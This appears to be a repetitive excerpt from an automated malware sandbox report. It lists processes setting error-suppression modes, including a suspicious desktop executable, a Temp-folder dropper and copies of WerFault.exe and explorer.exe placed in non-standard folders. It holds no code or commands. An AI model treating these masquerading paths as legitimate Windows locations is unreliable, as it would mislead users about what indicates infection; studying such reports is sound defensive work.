                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\regedit\explorer.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess information set: NOOPENFILEERRORBOX
